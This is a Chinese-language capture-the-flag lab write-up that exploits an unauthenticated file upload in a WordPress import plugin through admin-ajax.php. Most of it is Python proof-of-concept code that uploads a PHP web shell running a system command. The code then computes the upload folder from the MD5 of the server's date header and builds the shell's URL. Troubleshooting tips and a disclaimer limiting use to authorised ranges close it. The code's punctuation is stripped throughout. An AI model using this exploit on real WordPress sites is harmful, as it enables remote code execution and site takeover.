靶场环境Windows10虚拟机点击给的网址会出现这样的画面该主页存在“目录敏感文件泄露”的低危漏洞POCimport requests import os site 你靶场的URL file_to_upload shell.php # 上传恶意文件 up_req requests.post(fhttps://{site}/wp-admin/admin-ajax.php?pagepmxi-admin-settingsactionuploadnameevil.php, dataopen(file_to_upload, rb).read()) # 获取上传文件的目录 up_dir os.popen(fphp -r print md5(strtotime(\{up_req.headers[date]}\));).read() # 构建恶意文件的访问链接 print(fhttps://{site}/wp-content/uploads/wpallimport/uploads/{up_dir}/evil.php)shell.php的内容?php system(cat /flag); phpinfo(); ?ctrlR打开Windows10的终端执行1.py文件复制返回的地址直接粘贴到网站URL栏中跳转获取flag在靶场中遇到的一些问题问题一执行1.py文件的时候终端显示“php不是内部或外部命令 也不是可运行的程序”解决安装PHP网上有安装教程可以自行搜索如果不想安装PHP那么就用下面的方法POCimport requests,os import hashlib from datetime import datetime site你靶场的URL file_to_upload shell.zip up_req requests.post(https://site/wp-admin/admin-ajax.php?pagepmxi-admin- settingsactionuploadnameevil.php,dataopen(file_to_upload,rb).read()) print(up_req.headers[date])shell.zip的内容?php system(cat /flag); phpinfo(); ?CtrlR打开终端执行1.py文件并复制返回的时间网上搜索 “在线PHP执行工具”制造时间戳?php $txt你复制的时间; echo $txt; echo \n; echo strtotime($txt); echo \n; print md5(strtotime($txt)); ?返回网页拼接URL地址进行网页跳转获取flaghttps://你靶场的URL//wp-content/uploads/wpallimport/uploads/复制的MD5值/evil.php问题二最后页面跳转显示报错400并要求协议是https协议而不是http协议因为官方给出的POC中构造的URL就是http协议导致直接400如果强制在URL栏中修改为https那么页面就会返回404解决在POC中直接进行修改将http → https 上面步骤中给出的是修改过后的POC可以放心使用温馨提示文中演示的漏洞攻击手段仅用于授权靶场练习目的是学习漏洞防御知识。未获得授权的网站不允许任何渗透、扫描行为触碰法律红线会承担民事、刑事责任建议大家仅在合规靶场开展学习。